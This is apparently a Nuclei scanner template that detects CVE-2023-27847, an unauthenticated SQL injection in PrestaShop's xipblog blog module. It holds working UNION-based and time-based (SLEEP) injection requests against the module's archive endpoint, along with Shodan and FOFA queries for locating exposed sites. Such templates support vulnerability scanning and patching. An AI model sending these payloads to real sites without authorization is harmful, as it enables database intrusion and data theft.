id: CVE-2023-27847 info: name: PrestaShop xipblog - SQL Injection author: mastercho severity: critical description: | In the blog module (xipblog), an anonymous user can perform SQL injection. Even though the module has been patched in version 2.0.1, the version number was not incremented at the time. impact: | Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized accessand data leakage. reference: - https://security.friendsofpresta.org/modules/2023/03/23/xipblog.html - https://nvd.nist.gov/vuln/detail/CVE-2023-27847 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2023-27847 cwe-id: CWE-89 epss-score: 0.04685 epss-percentile: 0.91818 metadata: verified: true max-request: 2 framework: prestashop shodan-query: html:"/xipblog" fofa-query: app="Prestashop" tags: time-based-sqli,cve,cve2023,prestashop,sqli,xipblog flow: http(1) && http(2) variables: num: "999999999" http: - raw: - | GET / HTTP/1.1 Host: {{Hostname}} matchers: - type: dsl dsl: - 'contains_any(tolower(response), "prestashop", "xipblog")' internal: true - raw: - | @timeout: 20s GET /module/xipblog/archive?id=1&page_type=category&rewrite=news&subpage_type=post"+UNION+ALL+SELECT+NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(md5({{num}})),NULL,NULL--+- HTTP/1.1 Host: {{Hostname}} - | @timeout: 20s GET /module/xipblog/archive?id=1&page_type=category&rewrite=news&subpage_type=post"+AND+(SELECT+5728+FROM+(SELECT(SLEEP(6)))AuDU)--+lafl HTTP/1.1 Host: {{Hostname}} stop-at-first-match: true host-redirects: true matchers: - type: word name: union-based part: body_1 words: - '{{md5({{num}})}}' - type: dsl name: time-based dsl: - 'duration_2>=6' # digest: 4a0a00473045022100ee8271677f415ca4c4b08feef9da01311967e2b3edba130957466c852f81abdc02205b5163cdbae603a0d7d2ee225ddf03cb7c0dc41baaa66702977a26a34d94c5ae:922c64590222798bb761d5b6d8e72950